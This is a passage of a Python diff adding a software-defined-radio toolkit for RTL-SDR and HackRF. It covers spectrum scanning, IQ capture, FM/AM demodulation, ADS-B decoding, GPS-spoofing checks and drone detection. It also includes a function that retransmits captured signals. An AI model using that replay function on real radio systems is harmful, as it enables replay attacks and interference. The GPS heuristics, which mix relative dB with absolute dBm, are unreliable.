re.finditer( + r'(\d+):\s+(.+?)(?:,\s*(.+?))?\s*(?:SN:\s*(\S+))?', + output + ): + devices.append({ + 'type': 'rtl-sdr', + 'index': int(m.group(1)), + 'name': m.group(2).strip(), + 'serial': m.group(4) or 'N/A', + 'status': 'available', + 'capabilities': ['rx'], + }) + # If regex didn't match specifics, add generic entry + if not devices: + for i in range(count): + devices.append({ + 'type': 'rtl-sdr', + 'index': i, + 'name': 'RTL-SDR Device', + 'serial': 'N/A', + 'status': 'available', + 'capabilities': ['rx'], + }) + elif 'No supported devices' not in output: + # rtl_test ran but gave unexpected output + pass + except subprocess.TimeoutExpired: + pass + except Exception: + pass + else: + devices.append({ + 'type': 'rtl-sdr', + 'name': 'RTL-SDR', + 'serial': 'N/A', + 'status': 'tool_missing', + 'note': 'rtl_test not found — install rtl-sdr package', + 'capabilities': [], + }) + + # Check HackRF + hackrf_info = find_tool('hackrf_info') + if hackrf_info: + try: + result = subprocess.run( + [hackrf_info], + capture_output=True, text=True, timeout=8 + ) + output = result.stdout + result.stderr + if 'Serial number' in output: + serials = re.findall(r'Serial number:\s*(\S+)', output) + fw_versions = re.findall(r'Firmware Version:\s*(.+)', output) + for idx, serial in enumerate(serials): + devices.append({ + 'type': 'hackrf', + 'index': idx, + 'name': 'HackRF One', + 'serial': serial, + 'firmware': fw_versions[idx].strip() if idx < len(fw_versions) else 'Unknown', + 'status': 'available', + 'capabilities': ['rx', 'tx'], + }) + elif 'No HackRF' in output or result.returncode != 0: + pass + except subprocess.TimeoutExpired: + pass + except Exception: + pass + else: + devices.append({ + 'type': 'hackrf', + 'name': 'HackRF', + 'serial': 'N/A', + 'status': 'tool_missing', + 'note': 'hackrf_info not found — install hackrf package', + 'capabilities': [], + }) + + return devices + + # ── Spectrum Scanning ──────────────────────────────────────────────────── + + def scan_spectrum(self, device: str = 'rtl', freq_start: int = 88000000, + freq_end: int = 108000000, step: Optional[int] = None, + gain: Optional[int] = None, duration: int = 5) -> Dict[str, Any]: + """Sweep a frequency range and collect signal strength at each step. + + Returns a dict with 'data' (list of {freq, power_db}) and scan metadata. + """ + if step is None: + # Auto-calculate step based on range + span = freq_end - freq_start + if span <= 1000000: + step = 10000 # 10 kHz steps for narrow scans + elif span <= 10000000: + step = 100000 # 100 kHz steps + elif span <= 100000000: + step = 250000 # 250 kHz steps + else: + step = 1000000 # 1 MHz steps for wide scans + + results = {'data': [], 'device': device, 'freq_start': freq_start, + 'freq_end': freq_end, 'step': step, 'timestamp': datetime.now(timezone.utc).isoformat()} + + if device == 'hackrf': + return self._scan_hackrf(freq_start, freq_end, step, gain, duration, results) + else: + return self._scan_rtl(freq_start, freq_end, step, gain, duration, results) + + def _scan_rtl(self, freq_start, freq_end, step, gain, duration, results): + """Spectrum scan using rtl_power.""" + rtl_power = find_tool('rtl_power') + if not rtl_power: + results['error'] = 'rtl_power not found — install rtl-sdr package' + return results + + # rtl_power output file + outfile = self._sdr_dir / 'spectrum_scan.csv' + if outfile.exists(): + outfile.unlink() + + # Build command: rtl_power -f :: -g -i -1 + cmd = [rtl_power, + '-f', f'{freq_start}:{freq_end}:{step}', + '-i', str(duration), + '-1'] # single sweep + if gain is not None: + cmd.extend(['-g', str(gain)]) + cmd.append(str(outfile)) + + try: + proc = subprocess.run(cmd, capture_output=True, text=True, + timeout=duration + 30) + if not outfile.exists(): + results['error'] = 'No output from rtl_power: ' + (proc.stderr or proc.stdout) + return results + + # Parse CSV: date,time,Hz_low,Hz_high,Hz_step,samples,dB,dB,... + with open(outfile, 'r') as f: + for line in f: + line = line.strip() + if not line: + continue + parts = line.split(',') + if len(parts) < 7: + continue + try: + hz_low = float(parts[2]) + hz_step = float(parts[4]) + db_values = [float(x) for x in parts[6:] if x.strip()] + for i, db in enumerate(db_values): + freq = hz_low + (i * hz_step) + results['data'].append({ + 'freq': int(freq), + 'power_db': round(db, 2) + }) + except (ValueError, IndexError): + continue + + results['points'] = len(results['data']) + except subprocess.TimeoutExpired: + results['error'] = 'Spectrum scan timed out' + except Exception as e: + results['error'] = str(e) + + return results + + def _scan_hackrf(self, freq_start, freq_end, step, gain, duration, results): + """Spectrum scan using hackrf_sweep.""" + hackrf_sweep = find_tool('hackrf_sweep') + if not hackrf_sweep: + results['error'] = 'hackrf_sweep not found — install hackrf package' + return results + + # Convert Hz to MHz for hackrf_sweep + f_start_mhz = freq_start // 1000000 + f_end_mhz = max(freq_end // 1000000, f_start_mhz + 1) + + cmd = [hackrf_sweep, + '-f', f'{f_start_mhz}:{f_end_mhz}', + '-n', '8192', # FFT bin width + '-w', str(step)] + if gain is not None: + cmd.extend(['-l', str(gain)]) # LNA gain + + try: + proc = subprocess.run(cmd, capture_output=True, text=True, + timeout=duration + 30) + output = proc.stdout + # Parse hackrf_sweep output: date,time,Hz_low,Hz_high,Hz_bin_width,num_samples,dB... + for line in output.splitlines(): + line = line.strip() + if not line or line.startswith('#'): + continue + parts = line.split(',') + if len(parts) < 7: + continue + try: + hz_low = float(parts[2].strip()) + hz_bin_width = float(parts[4].strip()) + db_values = [float(x.strip()) for x in parts[6:] if x.strip()] + for i, db in enumerate(db_values): + freq = hz_low + (i * hz_bin_width) + if freq_start <= freq <= freq_end: + results['data'].append({ + 'freq': int(freq), + 'power_db': round(db, 2) + }) + except (ValueError, IndexError): + continue + + results['points'] = len(results['data']) + except subprocess.TimeoutExpired: + results['error'] = 'HackRF sweep timed out' + except Exception as e: + results['error'] = str(e) + + return results + + # ── Signal Capture ─────────────────────────────────────────────────────── + + def start_capture(self, device: str = 'rtl', frequency: int = 100000000, + sample_rate: int = 2048000, gain: str = 'auto', + duration: int = 10, output: Optional[str] = None) -> Dict[str, Any]: + """Capture raw IQ samples to a file.""" + with self._capture_lock: + if self._capture_process is not None and self._capture_process.poll() is None: + return {'error': 'Capture already in progress', 'capturing': True} + + ts = datetime.now(timezone.utc).strftime('%Y%m%d_%H%M%S') + freq_mhz = frequency / 1000000 + filename = output or f'capture_{freq_mhz:.3f}MHz_{ts}.raw' + filepath = self._recordings_dir / filename + + if device == 'hackrf': + tool = find_tool('hackrf_transfer') + if not tool: + return {'error': 'hackrf_transfer not found — install hackrf package'} + cmd = [tool, + '-r', str(filepath), + '-f', str(frequency), + '-s', str(sample_rate), + '-n', str(sample_rate * duration)] + if gain != 'auto': + cmd.extend(['-l', str(gain)]) + else: + tool = find_tool('rtl_sdr') + if not tool: + return {'error': 'rtl_sdr not found — install rtl-sdr package'} + cmd = [tool, + '-f', str(frequency), + '-s', str(sample_rate), + '-n', str(sample_rate * duration)] + if gain != 'auto': + cmd.extend(['-g', str(gain)]) + cmd.append(str(filepath)) + + try: + self._capture_process = subprocess.Popen( + cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE + ) + self._capture_info = { + 'file': str(filepath), + 'filename': filename, + 'device': device, + 'frequency': frequency, + 'sample_rate': sample_rate, + 'gain': gain, + 'duration': duration, + 'started': datetime.now(timezone.utc).isoformat(), + 'pid': self._capture_process.pid, + } + + # Auto-stop thread + def _auto_stop(): + try: + self._capture_process.wait(timeout=duration + 5) + except subprocess.TimeoutExpired: + self._capture_process.terminate() + finally: + self._finalize_capture() + + t = threading.Thread(target=_auto_stop, daemon=True) + t.start() + + return { + 'status': 'capturing', + 'file': filename, + 'frequency': frequency, + 'sample_rate': sample_rate, + 'duration': duration, + 'device': device, + } + except Exception as e: + self._capture_process = None + return {'error': f'Failed to start capture: {e}'} + + def _finalize_capture(self): + """Save metadata for a completed capture.""" + with self._capture_lock: + info = self._capture_info.copy() + filepath = Path(info.get('file', '')) + if filepath.exists(): + size = filepath.stat().st_size + info['size'] = size + info['size_human'] = self._human_size(size) + # Calculate actual duration from file size + sr = info.get('sample_rate', 2048000) + # IQ samples: 2 bytes per sample (8-bit I + 8-bit Q) for RTL-SDR + bytes_per_sample = 2 + actual_samples = size / bytes_per_sample + info['actual_duration'] = round(actual_samples / sr, 2) if sr > 0 else 0 + info['completed'] = datetime.now(timezone.utc).isoformat() + self._metadata.append(info) + self._save_metadata() + self._capture_process = None + self._capture_info = {} + + def stop_capture(self) -> Dict[str, Any]: + """Stop an active capture.""" + with self._capture_lock: + if self._capture_process is None or self._capture_process.poll() is not None: + return {'status': 'no_capture', 'message': 'No capture is running'} + try: + self._capture_process.terminate() + self._capture_process.wait(timeout=5) + except subprocess.TimeoutExpired: + self._capture_process.kill() + except Exception: + pass + self._finalize_capture() + return {'status': 'stopped', 'message': 'Capture stopped'} + + def is_capturing(self) -> bool: + """Check if a capture is currently running.""" + with self._capture_lock: + return (self._capture_process is not None + and self._capture_process.poll() is None) + + # ── Replay ─────────────────────────────────────────────────────────────── + + def replay_signal(self, file_path: str, frequency: int = 100000000, + sample_rate: int = 2048000, gain: int = 47) -> Dict[str, Any]: + """Transmit a captured signal via HackRF (TX only on HackRF).""" + hackrf = find_tool('hackrf_transfer') + if not hackrf: + return {'error': 'hackrf_transfer not found — install hackrf package'} + + # Resolve file path + fpath = Path(file_path) + if not fpath.is_absolute(): + fpath = self._recordings_dir / file_path + if not fpath.exists(): + return {'error': f'Recording file not found: {file_path}'} + + cmd = [hackrf, + '-t', str(fpath), + '-f', str(frequency), + '-s', str(sample_rate), + '-x', str(gain)] # -x = TX VGA gain + + try: + result = subprocess.run(cmd, capture_output=True, text=True, timeout=120) + if result.returncode == 0: + return { + 'status': 'completed', + 'message': f'Replayed {fpath.name} at {frequency/1e6:.3f} MHz', + 'file': fpath.name, + 'frequency': frequency, + } + else: + return { + 'error': f'Replay failed: {result.stderr or result.stdout}', + 'returncode': result.returncode, + } + except subprocess.TimeoutExpired: + return {'error': 'Replay timed out'} + except Exception as e: + return {'error': str(e)} + + # ── Recordings Management ──────────────────────────────────────────────── + + def list_recordings(self) -> List[Dict[str, Any]]: + """List all saved recordings with metadata.""" + self._load_metadata() + recordings = [] + # Include metadata-tracked recordings + for meta in self._metadata: + filepath = Path(meta.get('file', '')) + if filepath.exists(): + meta_copy = meta.copy() + meta_copy['exists'] = True + recordings.append(meta_copy) + else: + meta_copy = meta.copy() + meta_copy['exists'] = False + recordings.append(meta_copy) + + # Also check for un-tracked files in the recordings directory + tracked_files = {Path(m.get('file', '')).name for m in self._metadata} + for f in self._recordings_dir.iterdir(): + if f.is_file() and f.suffix in ('.raw', '.iq', '.wav', '.cu8', '.cs8'): + if f.name not in tracked_files: + stat = f.stat() + recordings.append({ + 'file': str(f), + 'filename': f.name, + 'size': stat.st_size, + 'size_human': self._human_size(stat.st_size), + 'device': 'unknown', + 'frequency': 0, + 'sample_rate': 0, + 'completed': datetime.fromtimestamp( + stat.st_mtime, tz=timezone.utc + ).isoformat(), + 'exists': True, + 'untracked': True, + }) + + # Sort by completed time, newest first + recordings.sort(key=lambda r: r.get('completed', ''), reverse=True) + return recordings + + def delete_recording(self, recording_id: str) -> Dict[str, Any]: + """Delete a recording by filename.""" + # Try to match against metadata + self._load_metadata() + new_meta = [] + deleted = False + for meta in self._metadata: + fname = Path(meta.get('file', '')).name + if fname == recording_id or meta.get('filename') == recording_id: + filepath = Path(meta.get('file', '')) + if filepath.exists(): + try: + filepath.unlink() + except Exception: + pass + deleted = True + else: + new_meta.append(meta) + + if deleted: + self._metadata = new_meta + self._save_metadata() + return {'status': 'deleted', 'file': recording_id} + + # Try direct file match in recordings directory + fpath = self._recordings_dir / recording_id + if fpath.exists(): + try: + fpath.unlink() + return {'status': 'deleted', 'file': recording_id} + except Exception as e: + return {'error': f'Could not delete: {e}'} + + return {'error': f'Recording not found: {recording_id}'} + + # ── Demodulation ───────────────────────────────────────────────────────── + + def demodulate_fm(self, file_path: str, frequency: Optional[int] = None) -> Dict[str, Any]: + """FM demodulate captured IQ data to audio.""" + fpath = self._resolve_recording(file_path) + if not fpath: + return {'error': f'Recording file not found: {file_path}'} + + outfile = fpath.with_suffix('.fm.wav') + + # Method 1: Use rtl_fm pipeline (if file was captured with rtl_sdr) + sox = find_tool('sox') + rtl_fm = find_tool('rtl_fm') + + # We'll use a Python-based approach: read raw IQ, apply FM demod, write WAV + try: + raw = fpath.read_bytes() + if len(raw) < 1024: + return {'error': 'File too small to demodulate'} + + # Assume unsigned 8-bit IQ (RTL-SDR default) + samples = [] + for i in range(0, len(raw) - 1, 2): + i_val = (raw[i] - 127.5) / 127.5 + q_val = (raw[i + 1] - 127.5) / 127.5 + samples.append(complex(i_val, q_val)) + + if len(samples) < 2: + return {'error': 'Not enough samples for demodulation'} + + # FM demodulation: phase difference between consecutive samples + audio = [] + for i in range(1, len(samples)): + conj = complex(samples[i - 1].real, -samples[i - 1].imag) + product = samples[i] * conj + import math + phase = math.atan2(product.imag, product.real) + audio.append(phase) + + # Downsample to ~48 kHz audio + # Assume 2.048 MHz sample rate → decimate by 42 for ~48.7 kHz + decimation = 42 + decimated = [audio[i] for i in range(0, len(audio), decimation)] + + # Normalize to 16-bit PCM + if not decimated: + return {'error': 'Demodulation produced no audio samples'} + max_val = max(abs(s) for s in decimated) or 1.0 + pcm = [int((s / max_val) * 32000) for s in decimated] + + # Write WAV file + import wave + with wave.open(str(outfile), 'w') as wav: + wav.setnchannels(1) + wav.setsampwidth(2) + wav.setframerate(48000) + wav.writeframes(struct.pack(f'<{len(pcm)}h', *pcm)) + + return { + 'status': 'completed', + 'output': str(outfile), + 'filename': outfile.name, + 'samples': len(pcm), + 'duration': round(len(pcm) / 48000, 2), + 'mode': 'FM', + } + except Exception as e: + return {'error': f'FM demodulation failed: {e}'} + + def demodulate_am(self, file_path: str, frequency: Optional[int] = None) -> Dict[str, Any]: + """AM demodulate captured IQ data to audio.""" + fpath = self._resolve_recording(file_path) + if not fpath: + return {'error': f'Recording file not found: {file_path}'} + + outfile = fpath.with_suffix('.am.wav') + + try: + raw = fpath.read_bytes() + if len(raw) < 1024: + return {'error': 'File too small to demodulate'} + + # AM demodulation: envelope detection (magnitude of IQ samples) + audio = [] + for i in range(0, len(raw) - 1, 2): + i_val = (raw[i] - 127.5) / 127.5 + q_val = (raw[i + 1] - 127.5) / 127.5 + import math + magnitude = math.sqrt(i_val * i_val + q_val * q_val) + audio.append(magnitude) + + if not audio: + return {'error': 'Not enough samples for AM demodulation'} + + # Remove DC offset + mean_val = sum(audio) / len(audio) + audio = [s - mean_val for s in audio] + + # Downsample to ~48 kHz + decimation = 42 + decimated = [audio[i] for i in range(0, len(audio), decimation)] + + # Normalize to 16-bit PCM + if not decimated: + return {'error': 'Demodulation produced no audio samples'} + max_val = max(abs(s) for s in decimated) or 1.0 + pcm = [int((s / max_val) * 32000) for s in decimated] + + # Write WAV + import wave + with wave.open(str(outfile), 'w') as wav: + wav.setnchannels(1) + wav.setsampwidth(2) + wav.setframerate(48000) + wav.writeframes(struct.pack(f'<{len(pcm)}h', *pcm)) + + return { + 'status': 'completed', + 'output': str(outfile), + 'filename': outfile.name, + 'samples': len(pcm), + 'duration': round(len(pcm) / 48000, 2), + 'mode': 'AM', + } + except Exception as e: + return {'error': f'AM demodulation failed: {e}'} + + # ── ADS-B Tracking ─────────────────────────────────────────────────────── + + def start_adsb(self, device: str = 'rtl') -> Dict[str, Any]: + """Start ADS-B aircraft tracking (1090 MHz).""" + with self._adsb_lock: + if self._adsb_running: + return {'status': 'already_running', 'message': 'ADS-B tracking is already active'} + + # Try dump1090 first, then rtl_adsb + dump1090 = find_tool('dump1090') + rtl_adsb = find_tool('rtl_adsb') + tool = dump1090 or rtl_adsb + + if not tool: + return {'error': 'No ADS-B tool found — install dump1090 or rtl-sdr (rtl_adsb)'} + + try: + if dump1090: + cmd = [dump1090, '--raw', '--net-only', '--quiet'] + else: + cmd = [rtl_adsb] + + self._adsb_process = subprocess.Popen( + cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True + ) + self._adsb_running = True + self._adsb_aircraft.clear() + + # Background thread to parse output + self._adsb_thread = threading.Thread( + target=self._adsb_reader, daemon=True + ) + self._adsb_thread.start() + + return { + 'status': 'started', + 'tool': Path(tool).name, + 'message': f'ADS-B tracking started with {Path(tool).name}', + } + except Exception as e: + self._adsb_running = False + return {'error': f'Failed to start ADS-B: {e}'} + + def _adsb_reader(self): + """Background thread to read and parse ADS-B output.""" + try: + while self._adsb_running and self._adsb_process: + line = self._adsb_process.stdout.readline() + if not line: + if self._adsb_process.poll() is not None: + break + continue + line = line.strip() + if not line: + continue + self._parse_adsb_message(line) + except Exception: + pass + finally: + self._adsb_running = False + + def _parse_adsb_message(self, msg: str): + """Parse a raw ADS-B hex message and update aircraft tracking.""" + # Clean up message + msg = msg.strip().lstrip('*').rstrip(';') + if not msg or len(msg) < 14: + return + + try: + data = bytes.fromhex(msg) + except ValueError: + return + + # Downlink Format (first 5 bits) + df = (data[0] >> 3) & 0x1F + + # We primarily care about DF17 (ADS-B extended squitter) + if df == 17 and len(data) >= 7: + # ICAO address is bytes 1-3 + icao = data[1:4].hex().upper() + # Type code is first 5 bits of ME field (byte 4) + tc = (data[4] >> 3) & 0x1F + + now = datetime.now(timezone.utc).isoformat() + + with self._adsb_lock: + if icao not in self._adsb_aircraft: + self._adsb_aircraft[icao] = { + 'icao': icao, + 'callsign': '', + 'altitude': None, + 'speed': None, + 'heading': None, + 'lat': None, + 'lon': None, + 'vertical_rate': None, + 'squawk': '', + 'first_seen': now, + 'last_seen': now, + 'messages': 0, + } + + ac = self._adsb_aircraft[icao] + ac['last_seen'] = now + ac['messages'] += 1 + + # TC 1-4: Aircraft identification + if 1 <= tc <= 4: + charset = '#ABCDEFGHIJKLMNOPQRSTUVWXYZ#####_###############0123456789######' + callsign = '' + if len(data) >= 11: + bits = int.from_bytes(data[4:11], 'big') + for i in range(8): + idx = (bits >> (42 - i * 6)) & 0x3F + if idx < len(charset): + callsign += charset[idx] + ac['callsign'] = callsign.strip().strip('#') + + # TC 9-18: Airborne position + elif 9 <= tc <= 18: + if len(data) >= 11: + alt_code = ((data[5] & 0xFF) << 4) | ((data[6] >> 4) & 0x0F) + # Remove Q-bit (bit 4) + q_bit = (alt_code >> 4) & 1 + if q_bit: + n = ((alt_code >> 5) << 4) | (alt_code & 0x0F) + ac['altitude'] = n * 25 - 1000 + + # TC 19: Airborne velocity + elif tc == 19: + if len(data) >= 11: + sub = data[4] & 0x07 + if sub in (1, 2): + ew_dir = (data[5] >> 2) & 1 + ew_vel = ((data[5] & 0x03) << 8) | data[6] + ns_dir = (data[7] >> 7) & 1 + ns_vel = ((data[7] & 0x7F) << 3) | ((data[8] >> 5) & 0x07) + ew_vel = (ew_vel - 1) * (-1 if ew_dir else 1) + ns_vel = (ns_vel - 1) * (-1 if ns_dir else 1) + import math + ac['speed'] = round(math.sqrt(ew_vel**2 + ns_vel**2)) + ac['heading'] = round(math.degrees(math.atan2(ew_vel, ns_vel)) % 360) + + def stop_adsb(self) -> Dict[str, Any]: + """Stop ADS-B tracking.""" + with self._adsb_lock: + if not self._adsb_running: + return {'status': 'not_running', 'message': 'ADS-B tracking is not active'} + + self._adsb_running = False + if self._adsb_process: + try: + self._adsb_process.terminate() + self._adsb_process.wait(timeout=5) + except Exception: + try: + self._adsb_process.kill() + except Exception: + pass + self._adsb_process = None + + count = len(self._adsb_aircraft) + return { + 'status': 'stopped', + 'message': f'ADS-B tracking stopped — {count} aircraft tracked', + 'aircraft_count': count, + } + + def get_adsb_aircraft(self) -> List[Dict[str, Any]]: + """Return current list of tracked aircraft.""" + with self._adsb_lock: + aircraft = list(self._adsb_aircraft.values()) + # Sort by last seen, most recent first + aircraft.sort(key=lambda a: a.get('last_seen', ''), reverse=True) + return aircraft + + # ── GPS Spoofing Detection ─────────────────────────────────────────────── + + def detect_gps_spoofing(self, duration: int = 30) -> Dict[str, Any]: + """Monitor GPS L1 frequency for spoofing indicators. + + Checks for: multiple strong signals, unusual power levels, + inconsistent signal patterns that suggest spoofing. + """ + gps_freq = 1575420000 # GPS L1 C/A: 1575.42 MHz + bandwidth = 2048000 # 2 MHz bandwidth around center + + rtl_power = find_tool('rtl_power') + rtl_sdr = find_tool('rtl_sdr') + + if not rtl_power and not rtl_sdr: + return {'error': 'No RTL-SDR tools found — install rtl-sdr package'} + + results = { + 'frequency': gps_freq, + 'duration': duration, + 'timestamp': datetime.now(timezone.utc).isoformat(), + 'analysis': {}, + 'spoofing_indicators': [], + 'risk_level': 'unknown', + } + + # Capture a short sample at GPS L1 frequency + if rtl_power: + outfile = self._sdr_dir / 'gps_check.csv' + if outfile.exists(): + outfile.unlink() + + freq_lo = gps_freq - 1000000 + freq_hi = gps_freq + 1000000 + cmd = [rtl_power, + '-f', f'{freq_lo}:{freq_hi}:10000', + '-i', str(min(duration, 10)), + '-1', + str(outfile)] + + try: + subprocess.run(cmd, capture_output=True, timeout=duration + 15) + + if outfile.exists(): + powers = [] + with open(outfile, 'r') as f: + for line in f: + parts = line.strip().split(',') + if len(parts) >= 7: + try: + db_values = [float(x) for x in parts[6:] if x.strip()] + powers.extend(db_values) + except ValueError: + continue + + if powers: + avg_power = sum(powers) / len(powers) + max_power = max(powers) + min_power = min(powers) + # Count strong signals (above average + 10dB) + threshold = avg_power + 10 + strong_signals = sum(1 for p in powers if p > threshold) + + results['analysis'] = { + 'avg_power_db': round(avg_power, 2), + 'max_power_db': round(max_power, 2), + 'min_power_db': round(min_power, 2), + 'power_range_db': round(max_power - min_power, 2), + 'strong_signals': strong_signals, + 'total_bins': len(powers), + } + + # Spoofing indicators + if max_power > -20: + results['spoofing_indicators'].append({ + 'indicator': 'Unusually strong GPS signal', + 'detail': f'Max power: {max_power:.1f} dBm (normal GPS: -130 to -120 dBm at ground)', + 'severity': 'high', + }) + + if strong_signals > len(powers) * 0.3: + results['spoofing_indicators'].append({ + 'indicator': 'Multiple strong carriers detected', + 'detail': f'{strong_signals} strong signals out of {len(powers)} bins', + 'severity': 'high', + }) + + if max_power - min_power < 5 and max_power > -60: + results['spoofing_indicators'].append({ + 'indicator': 'Flat power distribution', + 'detail': f'Power range only {max_power - min_power:.1f} dB — consistent with artificial signal', + 'severity': 'medium', + }) + + if max_power > -80: + results['spoofing_indicators'].append({ + 'indicator': 'Signal strength above expected GPS level', + 'detail': f'Max {max_power:.1f} dBm is well above typical GPS signal levels', + 'severity': 'medium', + }) + + # Overall risk + high = sum(1 for i in results['spoofing_indicators'] if i['severity'] == 'high') + med = sum(1 for i in results['spoofing_indicators'] if i['severity'] == 'medium') + if high >= 2: + results['risk_level'] = 'high' + elif high >= 1 or med >= 2: + results['risk_level'] = 'medium' + elif med >= 1: + results['risk_level'] = 'low' + else: + results['risk_level'] = 'none' + else: + results['analysis']['note'] = 'No power data collected — antenna may not receive GPS L1' + results['risk_level'] = 'unknown' + except subprocess.TimeoutExpired: + results['error'] = 'GPS monitoring timed out' + except Exception as e: + results['error'] = str(e) + else: + results['error'] = 'rtl_power not found (required for GPS analysis)' + + return results + + # ── Drone RF Detection ───────────────────────────────────────────────── + + def _load_drone_detections(self): + """Load saved drone detections from disk.""" + try: + if self._drone_detections_file.exists(): + with open(self._drone_detections_file, 'r') as f: + self._drone_detections = json.load(f) + else: + self._drone_detections = [] + except Exception: + self._drone_detections = [] + + def _save_drone_detections(self): + """Persist drone detections to disk.""" + try: + with open(self._drone_detections_file, 'w') as f: + json.dump(self._drone_detections, f, indent=2) + except Exception: + pass + + def start_drone_detection(self, device: str = 'rtl', duration: int = 0) -> Dict[str, Any]: + """Start continuous drone RF detection. + + Monitors known drone control frequencies: + - 2.4 GHz ISM band (DJI, common FPV) + - 5.8 GHz (DJI FPV, video downlinks) + - 900 MHz (long-range control links) + - 1.2 GHz (analog video) + - 433 MHz (some telemetry) + + DJI drones use OcuSync/Lightbridge on 2.4/5.8 GHz with frequency hopping. + FPV drones typically use fixed channels on 5.8 GHz for video. + + Args: + device: 'rtl' or 'hackrf' + duration: seconds to run (0 = until stopped) + + Returns detection results including: + - Frequency hopping patterns (characteristic of drone control) + - Signal strength and bearing estimation + - Protocol identification (DJI OcuSync, analog FPV, Crossfire, ELRS) + - Drone type estimation + """ + with self._drone_lock: + if self._drone_running: + return {'status': 'already_running', 'message': 'Drone detection is already active'} + + # Verify we have the required tools + if device == 'hackrf': + tool = find_tool('hackrf_sweep') + tool_name = 'hackrf_sweep' + if not tool: + return {'error': 'hackrf_sweep not found -- install hackrf package'} + else: + tool = find_tool('rtl_power') + tool_name = 'rtl_power' + if not tool: + return {'error': 'rtl_power not found -- install rtl-sdr package'} + + with self._drone_lock: + self._drone_running = True + + # Start background monitoring thread + self._drone_thread = threading.Thread( + target=self._drone_scan_loop, + args=(device, tool, duration), + daemon=True + ) + self._drone_thread.start() + + return { + 'status': 'started', + 'device': device, + 'tool': tool_name, + 'duration': duration if duration > 0 else 'continuous', + 'message': f'Drone detection started with {tool_name}', + 'bands': [v['desc'] for v in DRONE_FREQUENCIES.values()], + } + + def _drone_scan_loop(self, device: str, tool: str, duration: int): + """Background loop that sweeps drone frequency bands repeatedly.""" + import math + start_time = time.time() + + # Define scan bands -- we focus on 2.4 GHz and 5.8 GHz as primary, + # plus 900 MHz and 433 MHz as secondary bands + scan_bands = [ + { + 'name': '2.4 GHz ISM', + 'freq_start': 2400000000, + 'freq_end': 2500000000, + 'protocols': ['dji_control_2g', 'elrs_2g'], + }, + { + 'name': '5.8 GHz', + 'freq_start': 5640000000, + 'freq_end': 5950000000, + 'protocols': ['dji_control_5g', 'fpv_video_5g'], + }, + { + 'name': '900 MHz', + 'freq_start': 900000000, + 'freq_end': 930000000, + 'protocols': ['crossfire_900', 'elrs_900'], + }, + { + 'name': '433 MHz', + 'freq_start': 432000000, + 'freq_end': 435000000, + 'protocols': ['telemetry_433'], + }, + ] + + # History of power readings per band for hopping detection + band_history: Dict[str, List[Dict[str, Any]]] = {b['name']: [] for b in scan_bands} + + try: + while self._drone_running: + # Check duration limit + if duration > 0 and (time.time() - start_time) >= duration: + break + + for band in scan_bands: + if not self._drone_running: + break + + spectrum_data = self._drone_sweep_band( + device, tool, + band['freq_start'], band['freq_end'] + ) + + if not spectrum_data: + continue + + # Analyze the spectrum for drone signatures + detections = self._analyze_drone_spectrum( + spectrum_data, band, band_history[band['name']] + ) + + # Store sweep in history (keep last 10 sweeps per band) + band_history[band['name']].append({ + 'time': time.time(), + 'data': spectrum_data, + }) + if len(band_history[band['name']]) > 10: + band_history[band['name']].pop(0) + + # Add any new detections + if detections: + with self._drone_lock: + for det in detections: + self._drone_detections.append(det) + self._save_drone_detections() + + # Brief pause between full scan cycles + if self._drone_running: + time.sleep(1) + + except Exception: + pass + finally: + with self._drone_lock: + self._drone_running = False + + def _drone_sweep_band(self, device: str, tool: str, + freq_start: int, freq_end: int) -> List[Dict[str, Any]]: + """Perform a single spectrum sweep of a frequency band. + + Returns list of {freq, power_db} dicts. + """ + data = [] + + if device == 'hackrf': + # hackrf_sweep: output in CSV format + f_start_mhz = freq_start // 1000000 + f_end_mhz = max(freq_end // 1000000, f_start_mhz + 1) + cmd = [tool, '-f', f'{f_start_mhz}:{f_end_mhz}', '-n', '8192', '-w', '1000000'] + + try: + proc = subprocess.run(cmd, capture_output=True, text=True, timeout=15) + for line in proc.stdout.splitlines(): + line = line.strip() + if not line or line.startswith('#'): + continue + parts = line.split(',') + if len(parts) < 7: + continue + try: + hz_low = float(parts[2].strip()) + hz_bin_width = float(parts[4].strip()) + db_values = [float(x.strip()) for x in parts[6:] if x.strip()] + for i, db in enumerate(db_values): + freq = hz_low + (i * hz_bin_width) + if freq_start <= freq <= freq_end: + data.append({'freq': int(freq), 'power_db': round(db, 2)}) + except (ValueError, IndexError): + continue + except (subprocess.TimeoutExpired, Exception): + pass + else: + # rtl_power + outfile = self._sdr_dir / 'drone_sweep.csv' + if outfile.exists(): + outfile.unlink() + + # RTL-SDR tops out around 1766 MHz, so for 2.4/5.8 GHz bands + # we need HackRF. But we still try -- rtl_power will just fail + # gracefully if frequency is out of range. + step = 250000 # 250 kHz steps for drone detection + cmd = [tool, '-f', f'{freq_start}:{freq_end}:{step}', '-i', '2', '-1', str(outfile)] + + try: + subprocess.run(cmd, capture_output=True, text=True, timeout=15) + if outfile.exists(): + with open(outfile, 'r') as f: + for line in f: + parts = line.strip().split(',') + if len(parts) < 7: + continue + try: + hz_low = float(parts[2]) + hz_step = float(parts[4]) + db_values = [float(x) for x in parts[6:] if x.strip()] + for i, db in enumerate(db_values): + freq = hz_low + (i * hz_step) + data.append({'freq': int(freq), 'power_db': round(db, 2)}) + except (ValueError, IndexError): + continue + except (subprocess.TimeoutExpired, Exception): + pass + + return data + + def _analyze_drone_spectrum(self, spectrum_data: List[Dict[str, Any]], + band: Dict[str, Any], + history: List[Dict[str, Any]]) -> List[Dict[str, Any]]: + """Analyze spectrum sweep data for drone RF signatures. + + Looks for: + - Strong signals above the noise floor + - FHSS patterns (power appearing/disappearing at different frequencies) + - Characteristic bandwidths matching known drone protocols + - Fixed carriers on known FPV video channels + """ + import math + + detections = [] + if not spectrum_data: + return detections + + now = datetime.now(timezone.utc).isoformat() + powers = [d['power_db'] for d in spectrum_data] + if not powers: + return detections + + avg_power = sum(powers) / len(powers) + max_power = max(powers) + # Noise floor estimate: median of lowest 50% of readings + sorted_powers = sorted(powers) + noise_floor = sorted_powers[len(sorted_powers) // 4] if sorted_powers else avg_power + + # Detection threshold: noise floor + 15 dB + threshold = noise_floor + 15 + + # Find strong signal clusters above threshold + strong_bins = [d for d in spectrum_data if d['power_db'] > threshold] + if not strong_bins: + return detections + + # Group adjacent strong bins into clusters + clusters = self._cluster_signals(strong_bins) + + for cluster in clusters: + if len(cluster) < 2: + continue + + cluster_freqs = [d['freq'] for d in cluster] + cluster_powers = [d['power_db'] for d in cluster] + center_freq = (min(cluster_freqs) + max(cluster_freqs)) // 2 + bandwidth_hz = 